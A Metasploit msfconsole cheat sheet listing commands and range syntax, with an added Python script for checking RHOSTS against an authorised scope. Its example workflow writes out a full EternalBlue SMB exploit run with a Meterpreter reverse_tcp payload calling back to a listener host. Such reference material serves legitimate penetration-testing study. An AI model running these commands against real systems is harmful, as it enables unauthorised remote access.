Metasploit Framework (msfconsole)

Metasploit is a widely used penetration testing framework for developing, testing, and executing exploits. msfconsole is its primary command-line interface.

Starting Metasploit

msfconsole

Core Commands

  • help or ? : Show help menu
  • search <term> : Search for modules
  • use <module> : Select a module
  • set <option> <value> : Set module options
  • show options : Show module options
  • run or exploit : Execute the selected module
  • sessions : List/manage sessions
  • jobs : List/manage background jobs
  • exit or quit : Exit msfconsole

Module Commands

  • info : Show info about a module
  • show <type> : List modules of a given type (e.g., exploits, payloads)
  • back : Go back from the current context
  • reload_all : Reload all modules

Database Commands

  • db_connect : Connect to a database
  • db_import <file> : Import scan results
  • hosts : List all hosts in the database
  • services : List all services
  • vulns : List all vulnerabilities
  • creds : List all credentials

Example Workflow

msfconsole
search exploit/windows/smb/ms17_010_eternalblue
use exploit/windows/smb/ms17_010_eternalblue
set RHOSTS 10.10.10.10
set LHOST 10.10.14.1
set PAYLOAD windows/x64/meterpreter/reverse_tcp
run

Ranges and Lists

  • Many commands accept ranges (e.g., jobs -k 2-6,7,8,11..15)
  • IPs can be specified as lists, ranges, or CIDR (e.g., set RHOSTS 192.168.1.1-192.168.1.10,192.168.2.0/24)
  • See Nmap target specification for more details
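Because one RHOSTS value can mix lists, ranges and CIDR blocks, it helps to expand the string and compare it with the authorised scope before running anything. The following is an added example, not part of the original page and not Metasploit's own parser; the function names and the scope value are hypothetical, and it assumes only the three forms shown above (single IPv4 address, full start-end range, CIDR), counting every address in a CIDR block.

```python
import ipaddress

def parse_targets(spec):
    """(first, last) integer spans for single IPv4, start-end range and CIDR items."""
    spans = []
    for item in (s.strip() for s in spec.split(",")):
        if not item:
            continue
        if "/" in item:
            net = ipaddress.IPv4Network(item, strict=False)
            spans.append((int(net.network_address), int(net.broadcast_address)))
        elif "-" in item:
            lo, hi = (int(ipaddress.IPv4Address(p.strip())) for p in item.split("-", 1))
            if lo > hi:
                raise ValueError(f"descending range: {item}")
            spans.append((lo, hi))
        else:  # single address; any other form raises ValueError
            addr = int(ipaddress.IPv4Address(item))
            spans.append((addr, addr))
    return spans

def merge(spans):
    """Sort spans and join overlapping or adjacent ones."""
    merged = []
    for lo, hi in sorted(spans):
        if merged and lo <= merged[-1][1] + 1:
            merged[-1] = (merged[-1][0], max(merged[-1][1], hi))
        else:
            merged.append((lo, hi))
    return merged

def address_count(spec):
    """Number of distinct addresses the spec covers (overlaps counted once)."""
    return sum(hi - lo + 1 for lo, hi in merge(parse_targets(spec)))

def out_of_scope(spec, scope):
    """Return the items of spec that are not fully inside the authorised scope."""
    allowed = merge(parse_targets(scope))
    bad = []
    for item in (s.strip() for s in spec.split(",") if s.strip()):
        (lo, hi), = parse_targets(item)
        if not any(a <= lo and hi <= b for a, b in allowed):
            bad.append(item)
    return bad

if __name__ == "__main__":
    rhosts = "192.168.1.1-192.168.1.10,192.168.2.0/24"  # value from the page
    scope = "192.168.1.0/24"                             # constructed scope
    print(address_count(rhosts), out_of_scope(rhosts, scope))
```

An empty list from out_of_scope means every item sits inside the scope; a short-form range such as 192.168.1.1-10 is rejected with ValueError rather than guessed at.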

Tips

  • Use tab for autocompletion
  • Use banner for a random Metasploit banner
  • Use sessions -i <id> to interact with a session
  • Use route to pivot through sessions

For more details, see the Metasploit Unleashed Guide.